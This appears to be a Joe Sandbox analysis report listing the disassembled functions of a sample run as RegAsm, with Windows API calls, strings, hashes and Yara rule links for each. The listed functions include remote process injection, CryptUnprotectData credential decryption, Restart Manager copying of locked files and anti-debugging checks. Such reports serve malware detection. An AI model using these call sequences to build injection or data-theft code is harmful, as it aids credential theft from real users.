API ID: Cpp_errorThrow_std::_$CreateDirectory
String ID: \*.*
API String ID: 2715195259-1173974218
Opcode ID: b0b417d71e78197b8b7a0ed5392bacbe6d43b8ea538e5597217324a6cac543e3
Instruction ID: b2be1bc9108cd25bcd87be18baf4e69fd7455a47ff8891d9a14199d40660ba90
Opcode Fuzzy Hash: b0b417d71e78197b8b7a0ed5392bacbe6d43b8ea538e5597217324a6cac543e3
Instruction Fuzzy Hash: 7AE10470C00388DFDB10DFA9C9487EEBBB0FF25315F20425AE454AB292D7746A49DB65

Function 00432022 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 004320BA
GetLastError.KERNEL32(?,00000000,00000000), ref: 004320C4
FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004320DB
GetLastError.KERNEL32(?,00000000,00000000), ref: 004320E6
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004320F2
___std_fs_open_handle@16.LIBCPMT ref: 004321AB

Strings

]=_I, xrefs: 0043202B

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
String ID: ]=_I
API String ID: 2340820627-112444943
Opcode ID: 399e9fa649e6a34084e5cc74f8c51f104b45a1f2b4104aba3408bb700d2d57cc
Instruction ID: 7e0e21ba57e1066c6160095fdf5a0f96b949db91fc8e8bea8e80148e62c7c079
Opcode Fuzzy Hash: 399e9fa649e6a34084e5cc74f8c51f104b45a1f2b4104aba3408bb700d2d57cc
Instruction Fuzzy Hash: D971D275A007199FCB24CF28CE84BABB3B8BF09310F145296E954E3390D7B49E85CB95

Function 004CF280 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 240injectionmemorysynchronizationCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040,?,00000000), ref: 004CF2F1
WriteProcessMemory.KERNEL32(00000000,00000000,004C81DD,?,00000000), ref: 004CF30D
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 004CF342
VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000040), ref: 004CF36B
WriteProcessMemory.KERNEL32(?,00000000,?,00000218,00000000,?,?,?,00589328), ref: 004CF50F
WriteProcessMemory.KERNEL32(?,00000218,004CF5E0,-00000010,00000000,?,?,?,00589328), ref: 004CF531
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000218,00000000,00000000,00000000), ref: 004CF544
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00589328), ref: 004CF54D

Strings

%s|%s, xrefs: 004CF4EF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryProcessWrite$AllocVirtual$CreateObjectRemoteSingleThreadWait
String ID: %s|%s
API String ID: 2137838514-3399301454
Opcode ID: 269c15ef8152fd7dc724e7dc8876068e58f6e4ec777421701b0c5d8820c4676d
Instruction ID: 2ab717f03d3c912496b66fb944616d360f792c6fe5d042a247d22025e7d5b78f
Opcode Fuzzy Hash: 269c15ef8152fd7dc724e7dc8876068e58f6e4ec777421701b0c5d8820c4676d
Instruction Fuzzy Hash: 36B16BB1D002089FDB14CFA4CC95BAEBBB5FF18300F10426DE905BB291D774A984DBA5

Function 00409C90 Relevance: 13.9, APIs: 9, Instructions: 356libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00409D32
GetProcAddress.KERNEL32(?), ref: 00409E3D
GetProcAddress.KERNEL32(?), ref: 00409F36
GetProcAddress.KERNEL32(?), ref: 00409FBB
GetProcAddress.KERNEL32(?), ref: 0040A055
GetProcAddress.KERNEL32(?), ref: 0040A0EF
GetProcAddress.KERNEL32(?), ref: 0040A189
GetProcAddress.KERNEL32(?), ref: 0040A223
FreeLibrary.KERNEL32 ref: 0040A27B

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID:
API String ID: 2449869053-0
Opcode ID: 52f01a4dfbcb3f59218750f5f3945a65c16e243dd72f162a9732142b51316fa4
Instruction ID: 056e7afbc769c29073d59368404efc94fb89f274a412975777f329f96bf9ec8f
Opcode Fuzzy Hash: 52f01a4dfbcb3f59218750f5f3945a65c16e243dd72f162a9732142b51316fa4
Instruction Fuzzy Hash: 372286B8D05218EBCB15CF98D981AEDBBB1FF58310F2081AAD849B7350D7345A85EF45

Function 004534CF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00449E42: GetLastError.KERNEL32(00000000,?,0044F82B), ref: 00449E46
Part of subcall function 00449E42: SetLastError.KERNEL32(00000000,00000000,00000001,00000006,000000FF), ref: 00449EE8

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004535D7
IsValidCodePage.KERNEL32(00000000), ref: 00453615
IsValidLocale.KERNEL32(?,00000001), ref: 00453628
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00453670
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0045368B

Strings

*V, xrefs: 00453534
]=_I, xrefs: 004534D7

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: *V$]=_I
API String ID: 415426439-1069597329
Opcode ID: bb3ee8500ca9cacc625c50b97d6e48ff5c53ad3e39c4a6c01d9da358df15b7ae
Instruction ID: 4a54d826d8e8e5dc964d84ffa3ac1e49b68ae0fe58eca9cd8e7cd24ca5604c7d
Opcode Fuzzy Hash: bb3ee8500ca9cacc625c50b97d6e48ff5c53ad3e39c4a6c01d9da358df15b7ae
Instruction Fuzzy Hash: 4E517471A00209AFDB20DFA5CC41ABF77B8AF05743F14446AED01E7252EB74DA48DB65

Function 00452B5A Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00449E42: GetLastError.KERNEL32(00000000,?,0044F82B), ref: 00449E46
Part of subcall function 00449E42: SetLastError.KERNEL32(00000000,00000000,00000001,00000006,000000FF), ref: 00449EE8

GetACP.KERNEL32(?,?,?,?,?,?,00447300,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00452C19
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00447300,?,?,?,00000055,?,-00000050,?,?), ref: 00452C50
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00452DB3

Strings

*V, xrefs: 00452B98
utf8, xrefs: 00452D22
]=_I, xrefs: 00452D6A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: *V$]=_I$utf8
API String ID: 607553120-529272341
Opcode ID: 95727e6ef7b94787d777f99e21165c393144e5509e4be2ad3f52f8295ffa9360
Instruction ID: 742b11dcb7ff0b0bfa38c284345f0d68b4d7ce619a9ba0daefdf44cafbbca61f
Opcode Fuzzy Hash: 95727e6ef7b94787d777f99e21165c393144e5509e4be2ad3f52f8295ffa9360
Instruction Fuzzy Hash: F071FA32600602A6D725AF75CD45B6B73A8EF16705F10042FFD05D7283EBF8E94C9699

Function 00545050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00545061
GetVersionExA.KERNEL32(?), ref: 00545085
FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 005450B7
LocalFree.KERNEL32(?), ref: 005450CE
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00545106

Part of subcall function 00545B50: AreFileApisANSI.KERNEL32(00000000,00000000,?,?,?,005448A5), ref: 00545B5C
Part of subcall function 00545B50: MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,?,?,?,005448A5), ref: 00545B71
Part of subcall function 00545B50: MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00545B97

Strings

OsError 0x%x (%u), xrefs: 00545121

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharFormatMessageMultiWide$ApisErrorFileFreeLastLocalVersion
String ID: OsError 0x%x (%u)
API String ID: 807219750-2664311388
Opcode ID: 0d4010ca04ec75710d5123f11d165840ae7251f1f65bebee6710aad968807722
Instruction ID: 40d3e820988b70ea56f320253a2c5dfb69695040fa1f8efb038979f2cda04def
Opcode Fuzzy Hash: 0d4010ca04ec75710d5123f11d165840ae7251f1f65bebee6710aad968807722
Instruction Fuzzy Hash: 9621A476A00308BBDB20AB719C4AFDE7FB8FB55795F1000A5F909E3291E7709E05D661

Function 004532F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00453605,00000002,00000000,?,?,?,00453605,?,00000000), ref: 0045338C
GetLocaleInfoW.KERNEL32(?,20001004,00453605,00000002,00000000,?,?,?,00453605,?,00000000), ref: 004533B5
GetACP.KERNEL32(?,?,00453605,?,00000000), ref: 004533CA

Strings

OCP, xrefs: 00453347
ACP, xrefs: 00453311

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: b900ca414d4c4be95a8c6f041d08249478f894891a183a2f82a4edaf5765dc51
Instruction ID: 0023b8279c9b3e3643c8ce07df61025d6c2b7e12d2ffc4f7461f6cfcb2a1a3ae
Opcode Fuzzy Hash: b900ca414d4c4be95a8c6f041d08249478f894891a183a2f82a4edaf5765dc51
Instruction Fuzzy Hash: 8021C432600100A7DB308F54C900A9BB3A6AF50FD3B568466EC06D7312EF36EF49D358

Function 00452F77 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00449E42: GetLastError.KERNEL32(00000000,?,0044F82B), ref: 00449E46
Part of subcall function 00449E42: SetLastError.KERNEL32(00000000,00000000,00000001,00000006,000000FF), ref: 00449EE8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452FCB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00453015
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004530DB

Strings

]=_I, xrefs: 00452F82

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID: ]=_I
API String ID: 661929714-112444943
Opcode ID: ff75c3bfbb556e8aeb36ad727ba39d1036fe106649ba6405f725842e098eebb3
Instruction ID: 48740d242bba4bd8a9c349c0ec2c6d2d1cd0f344531baebb5e7d544be35332ed
Opcode Fuzzy Hash: ff75c3bfbb556e8aeb36ad727ba39d1036fe106649ba6405f725842e098eebb3
Instruction Fuzzy Hash: 4661C2315006079FEB249F25CC82BABB7A8EF04787F10417AED05C6686EB7CDA49CB54

Function 00438A64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00438B5C
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00438B66
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 00438B73

Strings

]=_I, xrefs: 00438A6F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ]=_I
API String ID: 3906539128-112444943
Opcode ID: 190c57a89f893cc3a60c21e64f5d89c3dc83bf777de16abb744d2c180980a4ce
Instruction ID: 8ec399b23226fa191ec5ef1820ea8a0bb8d05e2da4fe9e987d2f7c16b8c22cf0
Opcode Fuzzy Hash: 190c57a89f893cc3a60c21e64f5d89c3dc83bf777de16abb744d2c180980a4ce
Instruction Fuzzy Hash: 8331D4759013189BCB21DF65D8897CDBBB8BF08310F5051EAF81CA7251EB749B858F48

Function 0043C960 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333d4b6d5425d6f9d03797ee82114c3711da98524c03317fffdb5ec62fb2b380
Instruction ID: 01dad5c531b3804b6668612822d9feb5b6f7af541a2af8c3bc89036eeee974e8
Opcode Fuzzy Hash: 333d4b6d5425d6f9d03797ee82114c3711da98524c03317fffdb5ec62fb2b380
Instruction Fuzzy Hash: DA023A71E002199BDF14CFA9D9C06AEFBB1FF48314F24926AE919B7380D735A9418B94

Function 0048F070 Relevance: 6.3, APIs: 4, Instructions: 334processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0048F19C
Process32First.KERNEL32(00000000,?), ref: 0048F1C2
Process32Next.KERNEL32(00000000,00000128), ref: 0048F211
CloseHandle.KERNEL32(00000000), ref: 0048F227

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6ca91ff77de818ab86fec8847cef42055348f040cecef1f740a4035e6a8b01c5
Instruction ID: fbe0c60eb3c239f6b217fe84070aebb3c7b1e9daf40031a0165cf74cf1030098
Opcode Fuzzy Hash: 6ca91ff77de818ab86fec8847cef42055348f040cecef1f740a4035e6a8b01c5
Instruction Fuzzy Hash: ADD1BF71D002098BDB14DFA8C9857EEFBF5EF44304F24456AD805A7381E779AE88CBA5

Function 004938D0 Relevance: 6.2, APIs: 4, Instructions: 207fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,00565EFC,00565EFC,00000002,?,00000001), ref: 0049396F
FindNextFileA.KERNEL32(00000000,00000010), ref: 00493ACF
GetLastError.KERNEL32 ref: 00493ADD
FindClose.KERNEL32(00000000), ref: 00493AED

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Find$File$CloseErrorFirstLastNext
String ID:
API String ID: 819619735-0
Opcode ID: 1c7053a989fec14608a1a071b407907029c9f5ab493fb04f44d889ba6044901d
Instruction ID: 59bca9142b2f43e85d8f64eb9617364e40f7e337b3faf31c9dfe380ec3e76daa
Opcode Fuzzy Hash: 1c7053a989fec14608a1a071b407907029c9f5ab493fb04f44d889ba6044901d
Instruction Fuzzy Hash: 817124719002448BCF10CF64C8957FEBFB5AB56305F1442AAE441AB382D77A9F89CB64

Function 00434184 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00434190
IsDebuggerPresent.KERNEL32 ref: 0043425C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00434275
UnhandledExceptionFilter.KERNEL32(?), ref: 0043427F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5e995d56bca3090024ce11201d33d294d56103379e56bdf134d89c0665374a9e
Instruction ID: cc34265599f2dec34f964c3269ec222ae3e40e25564db7ad72de3f36d20b351d
Opcode Fuzzy Hash: 5e995d56bca3090024ce11201d33d294d56103379e56bdf134d89c0665374a9e
Instruction Fuzzy Hash: BB31F6B5D053189BDB20EFA5D9497CDBBB8AF08304F1041AAE40CAB250EB759A84CF59

Function 005449B0 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 005449CA
GetCurrentProcessId.KERNEL32 ref: 005449E5
GetTickCount.KERNEL32 ref: 005449FA
QueryPerformanceCounter.KERNEL32(?), ref: 00544A11

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4122616988-0
Opcode ID: 2761748a9af697217c0ec141a17cdb9775b7d53fbeab25e478c1a4390fc4254b
Instruction ID: a8b0bf13f8b3a5775aebc3e00f45f95b893848271c39c3c1d8b2d1e40acf56c4
Opcode Fuzzy Hash: 2761748a9af697217c0ec141a17cdb9775b7d53fbeab25e478c1a4390fc4254b
Instruction Fuzzy Hash: 8A110432A007298BDB118FA9DC885EAFBF9FF49225B404536EC49D7215D631A481CBE0

Function 004580D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 004580E9
GetSystemInfo.KERNEL32(?), ref: 00458104

Strings

D, xrefs: 004580F8

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 53f2c066bf0a3f036097ffc709ce78bf8807582e756120d0ec3c2933d4a49f04
Instruction ID: 15e633f26279e9839b0c5b245ad8314628d4ede9c042647a00b0634ca8b556b4
Opcode Fuzzy Hash: 53f2c066bf0a3f036097ffc709ce78bf8807582e756120d0ec3c2933d4a49f04
Instruction Fuzzy Hash: 7201F7336005096BDB24DE29DC05BDE7BBAAFD4325F0CC125ED59E7291EE38D90A8790

Function 00431D94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,00403E16), ref: 00431DA8
FormatMessageA.KERNEL32(00001300,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00403E16), ref: 00431DCF

Strings

!x-sys-default-locale, xrefs: 00431DA3

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: fcdca3659bb1d2a61432e1cd2d8e2713532a4f3d4bfe03f6844bae0cf60f700d
Instruction ID: 5533b84c20dc3ebd942ff18ae9bc369b32e0f46532b4feac63eb50df4c9c1bd4
Opcode Fuzzy Hash: fcdca3659bb1d2a61432e1cd2d8e2713532a4f3d4bfe03f6844bae0cf60f700d
Instruction Fuzzy Hash: 05F03076210104BFEB189B94DC1ADEB7ABCEB0A395F00411ABA02D6150E2B0AE0097B5

Function 004C6B00 Relevance: 4.7, APIs: 3, Instructions: 204encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004C6B57
LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,005599AF,000000FF,?,?,00000005), ref: 004C6B86
LocalFree.KERNEL32(?,?), ref: 004C6C82

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLocal$CryptDataUnprotect
String ID:
API String ID: 2835072361-0
Opcode ID: b004d05fd932710a5c603eca6713dccf5b15a223811f682e933633cabf7d092d
Instruction ID: 90b6470924ea9a925c498959a8113d32d71e754cc84c5268c76d6fdb8e080973
Opcode Fuzzy Hash: b004d05fd932710a5c603eca6713dccf5b15a223811f682e933633cabf7d092d
Instruction Fuzzy Hash: A271A171C002489BDB00DFA8C945BEEFBB4EF14314F14826EE855B3391EB786A45DBA5

Function 0044D130 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 410timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0044D575,00000000,00000000,00000000), ref: 0044D434

Strings

]=_I, xrefs: 0044D527

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: InformationTimeZone
String ID: ]=_I
API String ID: 565725191-112444943
Opcode ID: e5f61c86e57d161351e1e3fb9c9f04b0f212157e3416aa0cb0ddfca9fd5c615a
Instruction ID: f557b3224bfd27ad885fc6ec0cd909afa3cc3db28d165c2463de965fc128c346
Opcode Fuzzy Hash: e5f61c86e57d161351e1e3fb9c9f04b0f212157e3416aa0cb0ddfca9fd5c615a
Instruction Fuzzy Hash: 56D12472D00215ABEB20AF659C42ABF7BB9EF04714F54405BFD05EB291EB389E41C798

Function 00544A40 Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00544B20: GetVersionExA.KERNEL32(?), ref: 00544B51
Part of subcall function 00544B20: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00544B76
Part of subcall function 00544B20: GetFullPathNameW.KERNEL32(00000000,00000003,00000000,00000000), ref: 00544B96

Part of subcall function 00545330: GetVersionExA.KERNEL32(?), ref: 00545356

Part of subcall function 00545D90: GetVersionExA.KERNEL32(?), ref: 00545DB4

GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?), ref: 00544AC9
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?), ref: 00544AF6

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Version$DiskFreeFullNamePathSpace
String ID:
API String ID: 4112908208-0
Opcode ID: becd6c03501c24d27a43ccdd940953d2523818c8f4bbaac0c2ad00c18d494839
Instruction ID: f10753ebb869b3640b9ac64d1dc3f7217fc16a68dafdf90303c08a5a8463592c
Opcode Fuzzy Hash: becd6c03501c24d27a43ccdd940953d2523818c8f4bbaac0c2ad00c18d494839
Instruction Fuzzy Hash: 0C21257A980108ABDB21DB699844BFB7BBDFF00308F1400A6E941D7101FB31CE46CBA5

Function 004E90C0 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 423libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,74DEE010,?), ref: 004E92A0
GetProcAddress.KERNEL32(00000000,?), ref: 004E92B0
GetModuleHandleA.KERNEL32(?), ref: 004E93C8
GetProcAddress.KERNEL32(00000000,?), ref: 004E93D2
OpenProcess.KERNEL32(00000040,00000000,?), ref: 004E93DE
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000), ref: 004E944D
CloseHandle.KERNEL32(00000000), ref: 004E9480
CloseHandle.KERNEL32(00000000), ref: 004E94A6
CloseHandle.KERNEL32(00000000), ref: 004E94C6
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 004E9668
ResetEvent.KERNEL32(00000000), ref: 004E9671
CreateThread.KERNEL32(00000000,00000000,004E97A0,?,00000000,00000000), ref: 004E9695
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 004E96A1
RtlUnicodeStringToAnsiString.NTDLL ref: 004E96E7
CloseHandle.KERNEL32(00000000), ref: 004E9728
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000001), ref: 004E9734
CloseHandle.KERNEL32(00000000), ref: 004E9753
TerminateThread.KERNEL32(14D846FE,00000000), ref: 004E9781

Strings

File, xrefs: 004E94F0

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcStringThread$AnsiObjectOpenResetSingleTerminateUnicodeWait
String ID: File
API String ID: 3681783469-749574446
Opcode ID: 5519d313cc11df224254bb5c2ddb9f42228914f8febfa83a914f2ab3983c68cb
Instruction ID: b9b0c17e31d3cfe0bbc2e9151a178c1e78e3251af3666c5291f23336d4f8ce8a
Opcode Fuzzy Hash: 5519d313cc11df224254bb5c2ddb9f42228914f8febfa83a914f2ab3983c68cb
Instruction Fuzzy Hash: 6322D2B4D042599FDB24CF99D981BEEBBB4BF08310F104199E909B7390E7746A81CFA5

Function 004D6790 Relevance: 19.9, APIs: 13, Instructions: 424fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,00000000), ref: 004D6A20

Part of subcall function 004D6BA0: GetLastError.KERNEL32(?,00000000), ref: 004D6BD3
Part of subcall function 004D6BA0: RmStartSession.RSTRTMGR(?,00000000,?), ref: 004D6C50
Part of subcall function 004D6BA0: RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000,?), ref: 004D6C91
Part of subcall function 004D6BA0: RmGetList.RSTRTMGR(?,00000000,?,?,?), ref: 004D6CB9

std::_Throw_Cpp_error.LIBCPMT ref: 004D6B84
std::_Throw_Cpp_error.LIBCPMT ref: 004D6B95
RmShutdown.RSTRTMGR(?,00000001,00000000), ref: 004D6CDA
RmEndSession.RSTRTMGR(?), ref: 004D6CF7
SetLastError.KERNEL32(00000000), ref: 004D6CFE
CopyFileA.KERNEL32(?,?,00000000), ref: 004D6D25
GetLastError.KERNEL32(?,?,00000000), ref: 004D6D33
CopyFileA.KERNEL32(?,?,00000000), ref: 004D6D47

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CopyErrorFileLast$Cpp_errorSessionThrow_std::_$ListRegisterResourcesShutdownStart
String ID:
API String ID: 3293558552-0
Opcode ID: 34269084e38b8db14bed7b99909fd434936ce292801c6578ad0428061b37c9c8
Instruction ID: 506ad45c425b60783e5a35b13f18b7e09e4e0bf61d875f697530398146ac6994
Opcode Fuzzy Hash: 34269084e38b8db14bed7b99909fd434936ce292801c6578ad0428061b37c9c8
Instruction Fuzzy Hash: 0102BCB1C00249DBCB10DFA4C955BEEBBB5FF14314F14426AE805B7381EB786A49CBA5

Function 004EEA40 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 148memorystringCOMMON

Download Yara Rule

APIs

CharNextA.USER32 ref: 004EEA65
CharNextA.USER32 ref: 004EEA85
CharNextA.USER32 ref: 004EEAA5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004EEAD6
lstrlenA.KERNEL32(?,00000000,00000000,00000003,00000000), ref: 004EEB52
GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000003,00000000), ref: 004EEB6E
